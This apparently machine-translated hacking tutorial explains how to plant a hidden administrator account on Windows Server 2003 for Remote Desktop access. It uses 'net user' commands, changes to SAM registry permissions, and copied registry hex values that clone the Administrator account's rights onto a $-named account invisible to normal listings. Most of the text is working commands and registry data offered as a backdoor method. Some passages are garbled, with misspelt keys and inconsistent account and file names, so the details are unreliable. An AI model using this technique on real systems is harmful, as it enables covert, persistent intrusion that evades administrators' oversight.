windows 2003 open hidden account when logging into 3389 --- first establish cnlnfjhh$ user c:\\> net user cnlnfjhh$ wrsky /add //add $ in order to make the net under the console User can't see. Then run regedt32.exe (note that it is not regedit.exe) first find HKEY_LOCAL_MAICHINE\\SAM\\SAM Click on it, then add the account you are logged in to in the menu "Security"->"Permissions" Group, put "permissions"->" Full Control"->"Allow" to check and then confirm. This will directly read the local sam information. Now run regedit.exe Open key HKEY_LOCAL_MAICHINE\\ SAM\\SAM\\Domains\\account\\user\ ames\\cnlnfjhh$ View the default key value of "0x3f1" The corresponding export is as follows HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\ ames\\cnlnfjhh$ is cnlnfjhh$.reg HKEY_LOCAL_MACHINE\\SAM \\SAM\\Domains\\Account\\Users\\000003F1 is 3f1.reg HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4 for lf4.reg (the corresponding key for Administrators) Open lf4.reg with Notepad Find the following value for "F", as in this example, "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00, 00,00,00,00,00,00,00,00,00,\\ 00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff ,7f,40,6e,43,73,9f,50,c2,01,\\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00, 00,01,00,00,00,01,00,00,00,00,\\ 00,00,00,00,00,00,00 After copying it, open 3f1.reg and find "F" Value, delete it, and then paste the above paragraph. Open aspnet$.reg and copy the contents, such as the following example in this example [HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\cnlnfjhh $] @=hex(3f1): Go back to 3f1.reg and paste the above paragraph to the end of the file. The resulting file is as follows: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003F1] " F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 , \\ 00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2, 01,\\ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,0 0,00,00,\\ 00,00,00,00,00,00,00 "V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00 ,d4,00,00,00,1a,00,00,00,00,00,00,\\ 00,f0,00,00,00,10,00,00,00,00,00,00,00, 00,01,00,00,12,00,00,00,00,00,00,00,\\ 14,01,00,00,00,00,00,00,00,00,00,00,14 ,01,00,00,00,00,00,00,00,00,00,00,14,\\ 01,00,00,00,00,00,00,00,00,00,00,14, 01,00,00,00,00,00,00,00,00,00,00,14,01,\\ 00,00,00,00,00,00,00,00,00,00,14,01 ,00,00,00,00,00,00,00,00,00,00,14,01,00,\\ 00,00,00,00,00,00,00,00,00,14,01, 00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\\ 08,00,00,00,01,00,00,00,34,01,00 ,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\\ 00,00,00,00,00,00,00,5c,01,00, 00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\\ 00,00,00,00,00,00,01,00,14,80 ,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\\ 00,02,00,30,00,02,00,00,00, 02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\\ 00,00,00,00,02,c0,14,00,ff ,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\\ 00,70,00,04,00,00,00,00, 00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\\ 00,00,00,00,18,00,ff,07 , 0f, 00, 01, 02,00,00,00,00,00,05,20,00,00,00,20,02,00,\\ 00,00,00,18,00,ff,07,0f,00,01,02 ,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\\ 00,00,24,00,04,00,02,00,01,05, 00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\\e8,e4,1c,be,04,3e,32,e8,03,00 ,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\\ 00,00,01,02,00,00,00,00,00, 05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\\ 00,41,00,73,00,73,00,69,00 , 73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\\4c,68,62,97,a9,52,4b,62, 10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\\76,10,5e,37,62,01,00,ff ,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff 02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\\fa,2c,88,d7,f1,cd,99 ,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\\ 37,f1,02,cf,01,00, 01,00,01,00,01,00 [HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\cnlnfjhh$] @=hex(3f1): After saving, delete the cn\\fjhh$ user c:\\>net User cnlnfjhh$ /delete Run regedit.exe to import our modified 3f1.reg file. Finally, open Regedt32.exe find HKEY_LOCAL_MAICHINE\\SAM\\SAM Click on it, then in the menu "Security"->"Permissions" Delete the account you just added and then log out the current user with cnlnfjhh/wrsky Login will be the highest authority. 03 The clone method is slightly different from the 2000 clone. It is the first part of my article. This creates an account cnnffhh$, which is not visible in the console with net user and "computer management" Set the password again, don't change the password.